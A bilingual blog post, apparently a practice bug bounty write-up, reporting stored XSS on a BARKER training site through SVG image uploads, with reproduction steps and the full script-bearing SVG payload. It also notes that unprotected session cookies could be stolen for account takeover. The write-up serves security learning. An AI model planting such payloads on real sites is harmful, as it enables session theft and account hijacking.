登录后来到My profile页面,页面里存在一个Edit Profile
头像处可以上传SVG图片
检查 xss payload:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files
使用SVG进行图片上传,发现SVG文件上传成功并返回图片地址
poc:https://cfceb12f2bfd-sec875.a.barker-social.com/storage/EJvryUYazZY0PJSwKxFL9D1IPXD2DQtKie8g1Qcv.svg
英哥历史报告
l have discovered a Storage XSS vulnerability affecting the endpoint 'https://cfceb12f2bfd-sec875.a.barker-social.com/post' in the parameter 'post_image'. The payloed requires no filter bypass and is a simple, ' <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg> '
You can see a working proof of concept here:
https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)
To reproduce:
1.After logging in, you will come to the home page. There is an Attach image in the message.
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367398/cajsidqey3up2g6ke99v.png)
2.Check xss payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367471/ayhhkvw7ugkx5eossb04.png)
3.Use SVG to upload pictures. It is found that the SVG file is uploaded successfully and the picture address is returned.
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367855/mmvkxsjmpd3ktefnsvae.png)
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367534/t4d7fegeelnyhl9bgacj.png)
4.You will observe xss executes
https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)
Payload used:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
Vulnerable parameter: post_image
Endpoint/URL: https://cfceb12f2bfd-sec875.a.barker-social.com/post
lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.
标签:XSS,bugbountyhunter,BARKER,image,upload,https,SVG,com,png
From: https://www.cnblogs.com/sec875/p/18353723